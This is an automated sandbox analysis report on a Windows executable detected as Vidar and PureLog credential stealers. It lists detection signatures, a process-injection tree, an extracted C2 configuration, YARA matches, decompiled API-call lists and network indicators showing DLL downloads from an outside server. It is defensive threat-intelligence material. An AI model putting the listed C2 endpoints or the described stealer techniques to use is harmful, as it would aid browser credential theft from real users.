Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1437185
MD5:b9773393891d9cc471cd58cac09052dd
SHA1:784a14954c7abca7d7e2e92c60b93557238426f4
SHA256:0a8357cb9a1d348d1c4b4ec101f2328fd43f976803bcc360525ced55fbb9aeaf
Tags:exe
Infos:

Detection

PureLog Stealer, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Vidar stealer
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3228 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B9773393891D9CC471CD58CAC09052DD)
    • RegAsm.exe (PID: 5816 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199680449169"], "Botnet": "ad7dbf02afc50b46afd33ddc12f41082", "Version": "9.4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000000.1628578580.00000000009A2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
          • 0x211f0:$s1: JohnDoe
          • 0x31f80:$s1: JohnDoe
          • 0x211e8:$s2: HAL9TH
          Process Memory Space: file.exe PID: 3228JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.file.exe.9a0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              1.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                1.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x211f0:$s1: JohnDoe
                • 0x31f80:$s1: JohnDoe
                • 0x211e8:$s2: HAL9TH
                0.2.file.exe.3d65570.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.file.exe.3d65570.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                  • 0x1fbf0:$s1: JohnDoe
                  • 0x1fbe8:$s2: HAL9TH
                  Click to see the 4 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: file.exeAvira: detected
                  Found malware configuration
                  Source: 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199680449169"], "Botnet": "ad7dbf02afc50b46afd33ddc12f41082", "Version": "9.4"}
                  Multi AV Scanner detection for domain / URL
                  Source: https://65.108.152.56:9000/WVirustotal: Detection: 8%Perma Link
                  Source: https://65.108.152.56:9000/DVirustotal: Detection: 6%Perma Link
                  Source: https://65.108.152.56:9000/sqlx.dllgVirustotal: Detection: 8%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: file.exeReversingLabs: Detection: 63%
                  Source: file.exeVirustotal: Detection: 42%Perma Link
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004062F1 CryptUnprotectData,LocalAlloc,LocalFree,1_2_004062F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040628E CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_0040628E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040832A memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,1_2_0040832A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040247E memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,1_2_0040247E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FD97 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_0040FD97
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.105.90.131:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: NETCrypt.pdb source: file.exe
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040B700 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,1_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041531B _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_0041531B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414462 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,1_2_00414462
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409531 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00409531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040994C _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040994C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414B2E _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00414B2E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414ED2 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,1_2_00414ED2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409FBE _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409FBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004148AF _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,1_2_004148AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199680449169
                  Source: global trafficTCP traffic: 192.168.2.4:49732 -> 65.108.152.56:9000
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 104.105.90.131 104.105.90.131
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004041D4 _EH_prolog,GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_004041D4
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                  Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                  Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: file.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                  Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: file.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: file.exeString found in binary or memory: http://ocsp.digicert.com0A
                  Source: file.exeString found in binary or memory: http://ocsp.digicert.com0C
                  Source: file.exeString found in binary or memory: http://ocsp.digicert.com0H
                  Source: file.exeString found in binary or memory: http://ocsp.digicert.com0I
                  Source: file.exeString found in binary or memory: http://ocsp.digicert.com0X
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: file.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: RegAsm.exe, 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56/
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://65.108.152.56:9000
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/7
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/D
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/G
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/L~
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/W
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/dZ
                  Source: RegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2881326562.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/freebl3.dll
                  Source: RegAsm.exe, 00000001.00000002.2881326562.0000000000EA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/freebl3.dll4
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/freebl3.dllEdge
                  Source: RegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/mozglue.dll
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/mozglue.dllEdge
                  Source: RegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/msvcp140.dll
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/msvcp140.dlldge
                  Source: RegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/msvcp140.dllt
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/ng
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2881326562.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/nss3.dll
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/nss3.dllData
                  Source: RegAsm.exe, 00000001.00000002.2881415199.0000000000F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/nss3.dllU
                  Source: RegAsm.exe, 00000001.00000002.2881326562.0000000000EA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/nss3.dlldll
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/nss3.dllft
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/o
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/soft
                  Source: RegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/softokn3.dll
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/softokn3.dllessionKeyBackward
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/sqlx.dll
                  Source: RegAsm.exe, 00000001.00000002.2881415199.0000000000F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/sqlx.dllg
                  Source: RegAsm.exe, 00000001.00000002.2881326562.0000000000EA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/vcruntime140.dll
                  Source: RegAsm.exe, 00000001.00000002.2881415199.0000000000F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/vcruntime140.dll9000/nss3.dll
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/vcruntime140.dllUser
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/vcruntime140.dll_7)
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000/vcruntime140.dllyp
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000KFicrosoft
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000e1a3fmium
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000el
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000ing
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000l
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000lGoogle
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.108.152.56:9000softokn3.dlldge
                  Source: IEHJJE.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: IEHJJE.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: IEHJJE.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: IEHJJE.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=tIrWyaxi8A
